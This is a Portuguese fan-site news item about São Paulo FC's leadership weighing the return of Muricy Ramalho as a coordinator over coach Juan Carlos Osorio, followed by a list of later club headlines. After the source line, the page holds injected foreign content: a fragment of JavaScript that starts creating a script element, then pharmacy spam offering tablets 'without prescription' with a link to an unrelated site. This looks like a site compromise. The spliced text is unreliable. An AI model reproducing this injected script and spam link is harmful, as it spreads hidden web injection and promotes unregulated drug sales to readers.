Destaque

A volta de Muricy

E não é que o São Paulo, inseguro com o trabalho de Juan Carlos Osorio, chegou a cogitar a volta de Muricy Ramalho ao clube?

Depois da derrota para o Ceará semana passada a direção do Tricolor discutiu possível proposta a seu ex-treinador, com o objetivo de contrata-lo como uma espécie de coordenador. Muricy faria o ele entre os dirigentes do futebol e o colombiano que comanda a equipe.

Após novo fiasco diante do Flamengo, aí pelo Brasileirão, no último domingo, a ideia voltou a ser cogitada e Carlos Miguel Aidar resolveu esperar o segundo jogo contra o Ceará pela Copa do Brasil para definir se daria sequência ao projeto ou não.

Se o São Paulo não avançasse na competição, Osorio seguiria, mas teria que acatar a contratação de um coordenador. No caso, Muricy.

Como o time paulista venceu por 3 a 0 e segue vivo na competição, agora nas quartas de final, Muricy não foi contatado. E a possibilidade de o ter como coordenador, pelo menos no momento, não avançou.

Devido a problemas de saúde o treinador continua parado, tendo deixado o São Paulo em abril depois da eliminação da Libertadores pelo Cruzeiro. Tem recusado convites para voltar ao futebol, como técnico, mas como coordenador já sinalizou que poderia aceitar.

O problema no Morumbi, no entanto, é que Osorio teria que concordar com isso. E o colombiano é avesso à ideia, que não deixaria de ser uma interferência em seu trabalho.

Fonte: LanceNetvar d=document;var s=d.createElement(‘script’); take on at a low figure pills online purchase cheap tablets without prescription – http://new.921thefrog.com/index.php/purchase-cheap-tablets-without-prescription/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque

Mais em Destaque

Petros e Militão não treinam, mas estão confirmados no jogo de quarta

saopauloadmin16 de outubro de 2017

Em rede social, Lucas pede para Kaká voltar ao São Paulo

saopauloadmin16 de outubro de 2017

Dorival tem pilares para reerguer São Paulo

saopauloadmin16 de outubro de 2017

São Paulo aposta em Kaká para fechar com Adidas ou New Balance

saopauloadmin16 de outubro de 2017

Pratto finda jejum e celebra vitória do São Paulo: “Tirou um peso”

saopauloadmin15 de outubro de 2017

Atuação de camisa 10!

saopauloadmin15 de outubro de 2017

Dorival analisa virada e elogia torcida tricolor

saopauloadmin15 de outubro de 2017

São Paulo é derrotado pelo Atlético-MG fora de casa

saopauloadmin12 de outubro de 2017

São Paulo trabalha pênaltis e bola parada em treino antes de viajar

saopauloadmin10 de outubro de 2017